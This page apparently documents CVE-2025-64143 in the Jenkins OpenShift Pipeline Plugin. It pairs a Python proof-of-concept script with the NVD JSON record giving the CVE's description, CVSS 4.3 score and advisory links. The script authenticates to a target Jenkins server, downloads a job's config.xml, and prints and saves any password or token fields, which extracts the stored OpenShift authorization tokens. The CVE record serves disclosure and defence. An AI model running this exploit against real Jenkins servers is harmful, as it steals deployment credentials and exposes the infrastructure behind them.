CVE-2025-64143

# CVE-2025-64143 PoC - Jenkins OpenShift Pipeline Plugin Token Extraction # Requires Jenkins Item/Extended Read permission import requests from bs4 import BeautifulSoup import xml.etree.ElementTree as ET JENKINS_URL = "http://target-jenkins-server:8080" JOB_NAME = "vulnerable-openshift-job" USERNAME = "attacker" API_TOKEN = "attacker-api-token" def extract_config_xml(): """Extract job config.xml containing unencrypted tokens""" session = requests.Session() session.auth = (USERNAME, API_TOKEN) # Method 1: Via Jenkins API config_url = f"{JENKINS_URL}/job/{JOB_NAME}/config.xml" response = session.get(config_url) if response.status_code == 200: # Parse XML to find OpenShift credentials root = ET.fromstring(response.content) # Search for credential-related elements namespaces = { 'com.microsoft.jenkins.openshift': 'your-plugin-namespace' } # Look for password/secret fields for elem in root.iter(): if 'password' in elem.tag.lower() or 'token' in elem.tag.lower(): print(f"Found sensitive field: {elem.tag}") print(f"Value: {elem.text}") return response.text else: print(f"Failed to access config: {response.status_code}") return None def extract_via_api(): """Alternative extraction via Jenkins REST API""" session = requests.Session() session.auth = (USERNAME, API_TOKEN) # Get job API with config.xml api_url = f"{JENKINS_URL}/job/{JOB_NAME}/api/xml?depth=1" response = session.get(api_url) return response.text if __name__ == "__main__": config = extract_config_xml() if config: # Save for analysis with open(f"{JOB_NAME}_config.xml", "w") as f: f.write(config) print(f"Config saved to {JOB_NAME}_config.xml")

{"cve": {"id": "CVE-2025-64143", "sourceIdentifier": "[email protected]", "published": "2025-10-29T14:15:58.993", "lastModified": "2025-11-04T22:16:41.010", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Jenkins OpenShift Pipeline Plugin 1.0.57 and earlier stores authorization tokens unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Item/Extended Read permission, or access to the Jenkins controller file system."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-311"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jenkins:openshift_pipeline:*:*:*:*:*:jenkins:*:*", "versionEndIncluding": "1.0.57", "matchCriteriaId": "D163A2B0-4F41-4A68-B2B4-36E4387DF88C"}]}]}], "references": [{"url": "https://www.jenkins.io/security/advisory/2025-10-29/#SECURITY-3553", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/10/29/2", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}